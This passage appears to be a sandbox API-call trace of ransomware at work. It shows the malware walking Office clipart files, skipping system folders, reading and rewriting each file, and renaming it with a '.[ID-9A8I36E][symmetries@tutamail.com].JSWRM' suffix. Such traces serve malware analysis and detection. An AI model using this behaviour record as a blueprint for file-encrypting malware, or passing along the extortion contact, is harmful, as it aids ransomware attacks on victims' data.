lpString2="$RECYCLE.BIN") returned 1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="system volume information") returned -1 [0089.701] lstrcmpiW (lpString1="J0382836.JPG", lpString2="msocache") returned -1 [0089.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382836.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382836.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382836.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382836.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382836.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382836.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.702] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68572) returned 1 [0089.702] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10bd0) returned 0x24d210 [0089.702] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x10bd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x10bd0, lpOverlapped=0x0) returned 1 [0089.708] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.708] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x10bd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x10bd0, lpOverlapped=0x0) returned 1 [0089.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.710] CloseHandle (hObject=0x314) returned 1 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0089.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0089.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0089.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382836.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382836.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0089.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ce5a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382925.JPG", cAlternateFileName="")) returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2=".") returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="..") returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="...") returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="windows") returned -1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="recovery") returned -1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="perflogs") returned -1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="documents and settings") returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="system volume information") returned -1 [0089.711] lstrcmpiW (lpString1="J0382925.JPG", lpString2="msocache") returned -1 [0089.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382925.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382925.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382925.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382925.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382925.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382925.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.712] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=118362) returned 1 [0089.712] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ce50) returned 0x24d210 [0089.713] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1ce50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1ce50, lpOverlapped=0x0) returned 1 [0089.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.768] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1ce50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1ce50, lpOverlapped=0x0) returned 1 [0089.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.770] CloseHandle (hObject=0x314) returned 1 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0089.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0089.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0089.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0089.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382925.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382925.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.772] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4794eb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4794eb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1672c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382926.JPG", cAlternateFileName="")) returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2=".") returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="..") returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="...") returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="windows") returned -1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="recovery") returned -1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="perflogs") returned -1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="documents and settings") returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="system volume information") returned -1 [0089.772] lstrcmpiW (lpString1="J0382926.JPG", lpString2="msocache") returned -1 [0089.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382926.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382926.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382926.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382926.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382926.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382926.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0089.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.773] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=91948) returned 1 [0089.773] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16720) returned 0x24d210 [0089.774] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x16720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x16720, lpOverlapped=0x0) returned 1 [0089.783] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.783] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x16720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x16720, lpOverlapped=0x0) returned 1 [0089.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.785] CloseHandle (hObject=0x314) returned 1 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0089.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0089.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0089.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0089.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.785] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382926.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382926.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0089.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.789] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf49f727, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf49f727, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f86c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382927.JPG", cAlternateFileName="")) returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2=".") returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="..") returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="...") returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="windows") returned -1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="recovery") returned -1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="perflogs") returned -1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="documents and settings") returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="system volume information") returned -1 [0089.789] lstrcmpiW (lpString1="J0382927.JPG", lpString2="msocache") returned -1 [0089.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382927.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382927.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382927.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382927.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382927.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382927.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.790] 